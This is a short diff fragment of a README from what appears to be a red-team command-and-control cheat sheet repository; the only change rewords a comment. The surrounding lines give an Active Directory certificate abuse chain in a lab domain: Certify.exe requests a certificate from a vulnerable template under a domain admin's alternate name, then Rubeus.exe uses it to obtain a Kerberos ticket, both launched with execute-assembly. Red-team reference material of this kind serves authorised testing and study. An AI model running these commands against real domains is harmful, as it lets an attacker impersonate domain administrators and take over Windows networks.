wsummerhill/C2_RedTeam_CheatSheets/README.md

 # Request a new certificate for a vulnerable template from the above output
 execute-assembly C:\Certify.exe request /ca:lab.com\ops-dc01 /template:VulnTemplate /altname:DomainAdminUser1

-# Copy the certificate private key from the above output to a file, then request a TGT using the certificate file with Rubeus.exe
+# Copy the certificate private key from the above output to a file, then request a TGT using the certificate file with Rubeus
 execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminUser1 /certificate:C:\Temp\cert.pfx /domain:lab.com
 ```
 ------------------------------------------------------------------------------------------